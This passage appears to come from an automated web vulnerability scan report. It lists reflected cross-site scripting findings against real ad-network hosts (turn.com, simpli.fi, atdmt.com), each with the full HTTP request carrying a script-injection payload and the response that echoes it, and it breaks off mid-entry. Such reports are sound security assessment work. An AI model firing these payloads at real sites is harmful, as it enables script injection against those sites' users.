pf=8Mt9E8jY1D5SHH_QwobPDuHAb7itKB3GkV3zfXRMPegEHDf3VSm7MV0UT9XTVRzshf0lxsA7_48gcA3ADhdE_rnzAOWC2pHoxTLbOQstXs0FRX74yH0n7D0zI97xiD52IrFtzw7dv_bO66SkuBwqThZibidkt_-UfB5Fww37LIbMu531M0q9s6dNaVu6HfLoKxVOGD_4TQWkLXk3PTTLfia2uNnMhNqBK7wbPyCyAwJoJvopsz2-Y8QUSs3b2_eitm0WgNumQlTbUlWd5cImKjnDXqTzEUAbWHxFK-c1Qo3Y5UsTbxQBDX9CTlvy6QdLalndI-1rtcBpW_pEJbgtLpMZUrPKY99gNNNnJ-qtvObcM7yqRsMt5Wi-HxQYohcozZDZgYSSKhjRI-VCJG5uenT5iuJM_V1gF3e_UyWt-NfmqFw-sK79lep9GjUXWGPtwTD0S2zIA3WNoq6hg2sbC2Ku4dkSdZW3aDnLmSsphHWEJJM8n4Ufm9ht7LOPMdubuT-9I7mn4bPcIXO9HM_MdR8Buv4F2Cd-YD9fVZFpIjHoyrzZhA4k15gvM_oiVVECWczlzzPZYG9HRvn2wD6mbWPn3Uaw6TQPmMitF5RgGSC-P_nA9MiqXpWqzlngMkS9GqpFKradLK8t6sMLRXuMKNbYeTSxF2LxWldSiF6IW4EqRIkA9fFK69XCsE47P3r6xeXZEmtoQFhW6BlXU_S_O7WG6ucyScm1p-m6K1C2eIE6sQJQu9ouFWan6o5LdcpBfDtlwrLxgKTLmASX7Ehl6BSqETpdorksDeVJBZoIKV9jw-x_uGJ5ygCRQwyC1VPF_uGXU6LlkcSa3vONFlHX2QrWwLh0VZsR61B6eEqQyqEIHRagTsbF-zZRKG1a99wMOL93NtD6HDQwr4rpisA1_ZzDs9TpirrBfsFTSJ2Y2SKB1Ke-MWi9O980lJMYBvHpCd9u1kDpt4mQtWDqb9p9vaU0Sa9mepnjyBqZDgTO1ypHvc7FEC6WXsumPGb96CBWgO94bVXGh35ajhmsWGaxgDI-BlGJw1kysxGG327nsrSZg1_15JmjABg2gkvRprvKoyB5Up816Q7U6Bz_ac1GO6c5MRB5IiUbdwls_vUahbObwpJrZG-RjVwA_d345WgPEeucSzNFFUrjRQ8aNa8ftWaA_rLJQ--gAEiTcInKcs3htd3sFtEKoupskRMLd-P5xL2FJ5d0pLzqC2Rq9fqcDk3VbD_05MbJQnsPpJfs4TFoUzPPvU5k9RgeVzmqxUudLbiYvOFxWU4Di0JrSjLeb86JSiHhbEqIPonTFJLQHz2d9W5gGffEJ4WJJ7CXqsDUqqKTiryCaJOPtWB92P7L_hvpBsS-eKr9YJnjNaNZAp1i1uOFKyaW2BJuFJeCnWtWTqf_vAIMRm3AE-cd4KLWMcQkxc3lFRGgIwcsG-L53kvz3pr_KRoDYWcpDKlLusShxmI4sHpC5fQpnh9pG2nqHwrzngcdSAem7bib1CR2sWNNSu3o_wzyXYMlstvTPzBr; rrs=3%7C6%7C9%7C12%7C1002%7C1%7C4%7C7%7C10%7C1003%7C1006%7C2%7C1001%7C1004; rds=15082%7C15082%7C15082%7C15085%7C15085%7C15082%7C15088%7C15082%7C15082%7C15085%7C15091%7C15082%7C15082%7C15085; uid=2931142961646634775

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2931142961646634775; Domain=.turn.com; Expires=Mon, 24-Oct-2011 23:14:59 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Wed, 27 Apr 2011 23:14:58 GMT
Content-Length: 376

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&rnd=7467737437817093090&fpid=8c937"><script>alert(1)</script>8de8a8010a&nu=n&t=&sp=y&purl="
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

3.682. http://r.turn.com/server/pixel.htm [sp parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://r.turn.com
Path:	/server/pixel.htm

Issue detail

The value of the sp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dae6a"><script>alert(1)</script>dffdcde0b18 was submitted in the sp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=4&sp=dae6a"><script>alert(1)</script>dffdcde0b18&admeld_call_type=iframe&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/489/cnetnews/300x250/cnetnews_btf?t=1303946102032&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fnews.cnet.com%2F8301-30686_3-20057815-266.html%3Ftag%3DtopStories1&refer=http%3A%2F%2Fnews.cnet.com%2F%3Ftag%3Dhdr%3Bbrandnav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=RNJ9hNp_Ytke4K3_MLDetaBZCzjPRhryFEOqult4msa76nVUEQrqCfHGx7lLD55exEdzmswgsukEeGYUFx4XIGn96wzml5HD9lJW6BrLMriX4Qp5J-iSAILnbVuT-E5IREBfIGiYWGHD9doGCH1wTar1Ljo6rmrwvUfLD268riQ_eup_DpbPuBi-l0uJC1Cg4iLKE3m6yPkT4AvF4oP9oThAVWEvsmYmt6NIdXLN-7YnPNAqpsobwskjQzsb37_Pf2EzZTks7MGb0-GsBSAyZLfwESJ4HNhmJtjvBex-YKB5MGYB2nENTxzt6uCLwC5ZNpEEy1Y6E_EHxRfmbLZ1cZAp6lfWXEyXpQ0UKYwGF6TGhPyeXqnVY7Z3281c6JDsemNa-3CGw7dg2Xbxl9yyj4GzMLLi_eaSDDqINHp02oDhNKKp2uy6Jf_izbJ4fT1Iu_2URTPQwp7prxJqmG7gw9SyCjmpX6JZPgLa8yTvHuZqGjdQJTtjVZ9bXK_YQ_BTqP4noXltQtlWO_ADLz9yaG1HPNJmxjyYHWoZ-RvqO1R0S-iv_7FnY0Y5Xeddz_jO_ftWvK6YyvSIbYzcA4q2yx3BGIBe1qfIDTYPebZTLrDwtRWptERdq1_CwAIiDWPEKR1gXBTdH5jry0PtoQ1AeLHTgneiPs4w-PNB0rlR8LbQ13hqHz-NHOrXrabdjXmcRCHTQmWZ5Wp2jjyoTn-TRx9yZxewgOeaPJ0dTEeD2PttBPdeqoht9ByqjYbOh33ulo3YD0zbB9W6Jh-fPou70xdysS9NILgDVV-2RjchUloGmpS1vpTy7CEw_F27aSBKrxrCOwXSkhXOnAokDiKNJ7fwESJ4HNhmJtjvBex-YKAXUSxCCUQ26wFsXGXfUWiK7dQaUAsNKGmGOpY_21OII2rMkfzJCRjod-12LuM3yNFSsZtDmqT68cmfxNCdttVxemNa-3CGw7dg2Xbxl9yyjxUjUlBm2w0A6oYt2TFvb88wfqRHkdzRktg9x4ASm7mYj6Inq-va6FwQyLupvU3--XP7Da31DnYEVo5TPgRz20HK8hNK5y4spsdBx22_Atqh4yf7gWdRyY4nO--zz6sln7A3_z4NlZPxFoPt3Uw_aRVSN0m2klEeTW1KA1di8OAYXXVxlTgh_voK6emDWdftgO-nut4CNoTli9hKdQgGGL_ArFbsMU7SM_RHjy_6zjGAVdA-aRZXmNDP7lSI2wQSG_ZkBdgJgIHJ_0GD9hEAnNu6lhUpb2IzujoXnFpxd00nfu4977TrZ8GHyhed93dEHYQYHOHaF4abG8I094dduCWyYLZMG4wQKFopdYuz1yBkrjocbhf_en5ky2Zgm3rpe_TLLYkm6ow_hSldLzYIRQzPkiGLTlQAB-AyRlZy8hNM5CZdwH63dX586rlVt-rm7T5lk3rNTcwPq3Nv0aBcfX_WCWnBzCQuIbOVa7F8E-DsQQ0XtSgyP9-pRtjKBA9Cw6KpKCQRV_nuo9XTdqfcEuFjw1q3jr96MmE73EdnErm3vwl2KfkvqpOe3sJLkGJnPxWaM37S_qVbKjiLc0d7HG2j37arSozuBgqeZjp8etrKP0MMPHRCJQircGmeFefpToKqMVJJLJFDSB1wQojnNFLZVi-KxNkQ_VJiUnD6sFTZsgkWZhbwRXzuNDStWlCtyOUwHwhiIhI6vYlDAmBKnXtBmdLEA3K48MCNCNawEQzJsDf_Pg2Vk_EWg-3dTD9pFR_es5qV3056KPq2rUT5zBRTUUfVyhkIRasPswtxI7iKl7s6FAXEc8n5El2XcbrTucHE0v-tlwP1vZz1VQYwdIxV0D5pFleY0M_uVIjbBBIbBawJhlLv8g8ldsI-35kGCJVwRl8sycZ0PAtWrVTViuFYrui1COy2KOTpvlid1x6YDCy0LXBHUGgi2TaPtaYUWrJgtkwbjBAoWil1i7PXIGSp-mVft7M-LblYrLgbicDRcQIWfivnSOLEVf1fvaJ0LD4GOmXn-MdBpj5v6mUeKpEu_qA1v2JfEexKn5Jue0cnG6zc79hiM8lP3DRxPQPRgI0_xuWp1g1tkjZsLrAdv1550JC_L7GVNyA8GmhInk0modn5i3E9PsY1OXjKV8iYCdqOsFLtLW59aQLrs4R_Sm6HRv-fT0qZpcVwrwAMPoWw2SuEzmZPy7Pr3B2CT3i7f8WgzvsrFMQFtFLJosfmmwkcBIXiYC5KD6oiDkyhrBnCDrTceeWmOo3AglxIXXfIZd248k5q7u-e5MH_3Xle2fFdIDPTok26GX0-9FGi9EqsKDQR55l7woSi_1v5QjXhRriTW_fRiD-EyoZMz5Idfibr8WjiDSnM4ZZATJKUQIeAiWWBUQxuKfY0m-KUHuSwyrtLP__ldjsbRYS1T0uHXJk24PSL8z3mFkMRObsNqHzbQA0GI3YPOGb-lYcNs_O6CBvbTlsrpNMd1ulI4WK-iRF7ehMgm_ROAJYmpIw1CyVHCx4Lh6UpiYYG1o8vcl5mQP9VGVJnredzylZiYSDC8VOJU0K6xTdplSIqaWyjrlo4KhxO6BPAp6mtQbed5gA0Cjgnp6Rw5lmAsU07N51K5j3PZSzxrE9kN_uZFovGfORhH6MoH1n1mLx2USSZv2x8_HGESPaIScxefiiPNK0OCUG5MdnRQlgwUbxU_0BtXy0yd8WW2V42t-IFhBe9yaSFw1_tpW4L2632z_PWw-s3g_lGgo6LZg0d3xlBa7ocQft3sG2mMmWuyyqIdPSqtxjRklIlnrGECTG2lMEZCOsAdkiEkwcNQoFjB6uEJlwUgsEKF4_WO7NWBkt0qQueOBvF3XTM0Qj0i6d6Ne-SMo9ZRW34nL2E8dfUI4qK_3hTt65_O1ilUO_qIHp6Muzc_la1U_2OjiAOU7PEbuWm84pe5TEp0-dwH4uGF_DEF6HvhgoubqHZESmqy0_uUoo7aAuONZ3XbPI2lPBO0ew9_baQ3iGFyTbNllGW2-6SPL-Yz_5v0XPkSOvI7kYSdc19CnoSeevm6OsBW-cQfSWP67IsCnN3J3RK7HJ47DOwUgikkAA72ly1dOLu1ZkDcoAF8YeGRX_lq7jZ32JrugGCjUIuqMkyLoTQYaIc9uW48ZcNu2ciILtP-yK1JywsvYFiqMlV9gHJ2EXSlkdHYPQHM9nqB2E7HqGtyuc3OfzTlki21Iked0l5Ymb2bmtH2iyNubJGsSKw_zqF-QjnG4_NexZYaYWdSdJxVooCOghLFZBKn_0EQO2vAre22F8lnSmyeDcza7YGogWldkaT1u5x3E36xXrNS7o-uQk9nl956dFM0clLfmZEZSVy6Y-xcSL0nyDvBegaxMxUkPFg2MrXe2Tu6RZYK_eJ83sbVbZgk4Mm2xjvgW7-OS05wcvyGHBsJw9q1CYZ-KKGVDzHPl9zlz7CulV5IVqtOgzxHZaVHOIdEQIOjCbv6Ls4W-7l6hZieh5H5pfJvz0_xp0u9Sr3Ow-0lehezJJr2l8tby08-BywuvZFxyM4somZiu5xkNZQ15_U6Rpo-UcV-kqgda3I_RK6XB_G-nPmaE7wHqMJQ3-EmxOFvfzd5YD06fPVNZ1LTBZN4ocL1Rk_SlsYqw7IlYjuWqlv4egixt5B17GL1Jx5afmr; fc=S44WeTE_hcsignE6AFtjxTFBxEpH-UBt3Uc78oaz-ks4OhgZIpdKD2vECvnz_VEM2CjyBHHN4B50paqel1-StJLdzlSJYnWgjgpSWPKJZqanh77CDv_Cb5k2sLKUWKhY0sNf3mqCcrIxbMgK0qZIglL8KhgM5_wQzjFfm742WtkVxzGoC7kGLIbIhejl5eSL117dg5whaFGMwxNuo3bM3cdBF4hyWWGJ3xpNV_dvAQw_F9c8z5-xQ96PvJcb-tlK; rv=1; pf=8Mt9E8jY1D5SHH_QwobPDuHAb7itKB3GkV3zfXRMPegEHDf3VSm7MV0UT9XTVRzshf0lxsA7_48gcA3ADhdE_rnzAOWC2pHoxTLbOQstXs0FRX74yH0n7D0zI97xiD52IrFtzw7dv_bO66SkuBwqThZibidkt_-UfB5Fww37LIbMu531M0q9s6dNaVu6HfLoKxVOGD_4TQWkLXk3PTTLfia2uNnMhNqBK7wbPyCyAwJoJvopsz2-Y8QUSs3b2_eitm0WgNumQlTbUlWd5cImKjnDXqTzEUAbWHxFK-c1Qo3Y5UsTbxQBDX9CTlvy6QdLalndI-1rtcBpW_pEJbgtLpMZUrPKY99gNNNnJ-qtvObcM7yqRsMt5Wi-HxQYohcozZDZgYSSKhjRI-VCJG5uenT5iuJM_V1gF3e_UyWt-NfmqFw-sK79lep9GjUXWGPtwTD0S2zIA3WNoq6hg2sbC2Ku4dkSdZW3aDnLmSsphHWEJJM8n4Ufm9ht7LOPMdubuT-9I7mn4bPcIXO9HM_MdR8Buv4F2Cd-YD9fVZFpIjHoyrzZhA4k15gvM_oiVVECWczlzzPZYG9HRvn2wD6mbWPn3Uaw6TQPmMitF5RgGSC-P_nA9MiqXpWqzlngMkS9GqpFKradLK8t6sMLRXuMKNbYeTSxF2LxWldSiF6IW4EqRIkA9fFK69XCsE47P3r6xeXZEmtoQFhW6BlXU_S_O7WG6ucyScm1p-m6K1C2eIE6sQJQu9ouFWan6o5LdcpBfDtlwrLxgKTLmASX7Ehl6BSqETpdorksDeVJBZoIKV9jw-x_uGJ5ygCRQwyC1VPF_uGXU6LlkcSa3vONFlHX2QrWwLh0VZsR61B6eEqQyqEIHRagTsbF-zZRKG1a99wMOL93NtD6HDQwr4rpisA1_ZzDs9TpirrBfsFTSJ2Y2SKB1Ke-MWi9O980lJMYBvHpCd9u1kDpt4mQtWDqb9p9vaU0Sa9mepnjyBqZDgTO1ypHvc7FEC6WXsumPGb96CBWgO94bVXGh35ajhmsWGaxgDI-BlGJw1kysxGG327nsrSZg1_15JmjABg2gkvRprvKoyB5Up816Q7U6Bz_ac1GO6c5MRB5IiUbdwls_vUahbObwpJrZG-RjVwA_d345WgPEeucSzNFFUrjRQ8aNa8ftWaA_rLJQ--gAEiTcInKcs3htd3sFtEKoupskRMLd-P5xL2FJ5d0pLzqC2Rq9fqcDk3VbD_05MbJQnsPpJfs4TFoUzPPvU5k9RgeVzmqxUudLbiYvOFxWU4Di0JrSjLeb86JSiHhbEqIPonTFJLQHz2d9W5gGffEJ4WJJ7CXqsDUqqKTiryCaJOPtWB92P7L_hvpBsS-eKr9YJnjNaNZAp1i1uOFKyaW2BJuFJeCnWtWTqf_vAIMRm3AE-cd4KLWMcQkxc3lFRGgIwcsG-L53kvz3pr_KRoDYWcpDKlLusShxmI4sHpC5fQpnh9pG2nqHwrzngcdSAem7bib1CR2sWNNSu3o_wzyXYMlstvTPzBr; rrs=3%7C6%7C9%7C12%7C1002%7C1%7C4%7C7%7C10%7C1003%7C1006%7C2%7C1001%7C1004; rds=15082%7C15082%7C15082%7C15085%7C15085%7C15082%7C15088%7C15082%7C15082%7C15085%7C15091%7C15082%7C15082%7C15085; uid=2931142961646634775

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2931142961646634775; Domain=.turn.com; Expires=Mon, 24-Oct-2011 23:15:06 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Wed, 27 Apr 2011 23:15:05 GMT
Content-Length: 377

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&rnd=8117006397728817159&fpid=4&nu=n&t=&sp=dae6a"><script>alert(1)</script>dffdcde0b18&purl="
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

3.683. http://um.simpli.fi/am_js.js [admeld_adprovider_id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://um.simpli.fi
Path:	/am_js.js

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c4e8a'-alert(1)-'a9d1f4ab679 was submitted in the admeld_adprovider_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /am_js.js?admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=338c4e8a'-alert(1)-'a9d1f4ab679&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: um.simpli.fi
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/489/cbsnews/300x250/cbsnews_btf?t=1303946378201&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fcbsinteractive.com&refer=http%3A%2F%2Fwww.cbsnews.com%2Fstories%2F2011%2F04%2F27%2Fscitech%2Fmain20057741.shtml%3Ftag%3Dstack
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=33KJlw0AY6A4eg4s7B36C0%3D%3D

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 27 Apr 2011 23:21:03 GMT
Content-Type: application/x-javascript
Connection: close
Content-Length: 185

document.write('<img width="0" height="0" src="http://tag.admeld.com/match?admeld_adprovider_id=338c4e8a'-alert(1)-'a9d1f4ab679&external_user_id=978972DFA063000D2C0E7A380BFA1DEC"/>');

3.684. http://um.simpli.fi/am_js.js [admeld_callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://um.simpli.fi
Path:	/am_js.js

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7afdd'-alert(1)-'1cb9d3da315 was submitted in the admeld_callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /am_js.js?admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=338&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match7afdd'-alert(1)-'1cb9d3da315 HTTP/1.1
Host: um.simpli.fi
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/489/cbsnews/300x250/cbsnews_btf?t=1303946378201&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fcbsinteractive.com&refer=http%3A%2F%2Fwww.cbsnews.com%2Fstories%2F2011%2F04%2F27%2Fscitech%2Fmain20057741.shtml%3Ftag%3Dstack
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=33KJlw0AY6A4eg4s7B36C0%3D%3D

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 27 Apr 2011 23:21:04 GMT
Content-Type: application/x-javascript
Connection: close
Content-Length: 185

document.write('<img width="0" height="0" src="http://tag.admeld.com/match7afdd'-alert(1)-'1cb9d3da315?admeld_adprovider_id=338&external_user_id=978972DFA063000D2C0E7A380BFA1DEC"/>');

3.685. http://um.simpli.fi/am_match [admeld_adprovider_id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://um.simpli.fi
Path:	/am_match

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 737fe'-alert(1)-'6597255bd8 was submitted in the admeld_adprovider_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /am_match?admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=338737fe'-alert(1)-'6597255bd8&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: um.simpli.fi
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/489/cbsnews/300x250/cbsnews_btf?t=1303946378201&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fcbsinteractive.com&refer=http%3A%2F%2Fwww.cbsnews.com%2Fstories%2F2011%2F04%2F27%2Fscitech%2Fmain20057741.shtml%3Ftag%3Dstack
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=33KJlw0AY6A4eg4s7B36C0%3D%3D

Response (redirected)

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 27 Apr 2011 23:21:00 GMT
Content-Type: application/x-javascript
Connection: close
Content-Length: 184

document.write('<img width="0" height="0" src="http://tag.admeld.com/match?admeld_adprovider_id=338737fe'-alert(1)-'6597255bd8&external_user_id=978972DFA063000D2C0E7A380BFA1DEC"/>');

3.686. http://um.simpli.fi/am_match [admeld_callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://um.simpli.fi
Path:	/am_match

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8f422'-alert(1)-'76cc39ce4c1 was submitted in the admeld_callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /am_match?admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=338&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match8f422'-alert(1)-'76cc39ce4c1 HTTP/1.1
Host: um.simpli.fi
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/489/cbsnews/300x250/cbsnews_btf?t=1303946378201&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fcbsinteractive.com&refer=http%3A%2F%2Fwww.cbsnews.com%2Fstories%2F2011%2F04%2F27%2Fscitech%2Fmain20057741.shtml%3Ftag%3Dstack
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=33KJlw0AY6A4eg4s7B36C0%3D%3D

Response (redirected)

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 27 Apr 2011 23:21:00 GMT
Content-Type: application/x-javascript
Connection: close
Content-Length: 185

document.write('<img width="0" height="0" src="http://tag.admeld.com/match8f422'-alert(1)-'76cc39ce4c1?admeld_adprovider_id=338&external_user_id=978972DFA063000D2C0E7A380BFA1DEC"/>');

3.687. http://um.simpli.fi/am_redirect_js [admeld_adprovider_id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://um.simpli.fi
Path:	/am_redirect_js

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 398f0'-alert(1)-'f08a4e6b72b was submitted in the admeld_adprovider_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /am_redirect_js?admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=338398f0'-alert(1)-'f08a4e6b72b&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: um.simpli.fi
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/489/cbsnews/300x250/cbsnews_btf?t=1303946378201&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fcbsinteractive.com&refer=http%3A%2F%2Fwww.cbsnews.com%2Fstories%2F2011%2F04%2F27%2Fscitech%2Fmain20057741.shtml%3Ftag%3Dstack
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=33KJlw0AY6A4eg4s7B36C0%3D%3D

Response (redirected)

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 27 Apr 2011 23:21:03 GMT
Content-Type: application/x-javascript
Connection: close
Content-Length: 185

document.write('<img width="0" height="0" src="http://tag.admeld.com/match?admeld_adprovider_id=338398f0'-alert(1)-'f08a4e6b72b&external_user_id=978972DFA063000D2C0E7A380BFA1DEC"/>');

3.688. http://um.simpli.fi/am_redirect_js [admeld_callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://um.simpli.fi
Path:	/am_redirect_js

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c4d23'-alert(1)-'bde43ea7f4f was submitted in the admeld_callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /am_redirect_js?admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=338&admeld_call_type=js&admeld_callback=http://tag.admeld.com/matchc4d23'-alert(1)-'bde43ea7f4f HTTP/1.1
Host: um.simpli.fi
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/489/cbsnews/300x250/cbsnews_btf?t=1303946378201&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fcbsinteractive.com&refer=http%3A%2F%2Fwww.cbsnews.com%2Fstories%2F2011%2F04%2F27%2Fscitech%2Fmain20057741.shtml%3Ftag%3Dstack
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=33KJlw0AY6A4eg4s7B36C0%3D%3D

Response (redirected)

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 27 Apr 2011 23:21:03 GMT
Content-Type: application/x-javascript
Connection: close
Content-Length: 185

document.write('<img width="0" height="0" src="http://tag.admeld.com/matchc4d23'-alert(1)-'bde43ea7f4f?admeld_adprovider_id=338&external_user_id=978972DFA063000D2C0E7A380BFA1DEC"/>');

3.689. http://view.atdmt.com/CNT/iview/136138030/direct [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://view.atdmt.com
Path:	/CNT/iview/136138030/direct

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload be861'%3b1d6bf994b83 was submitted in the REST URL parameter 4. This input was echoed as be861';1d6bf994b83 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

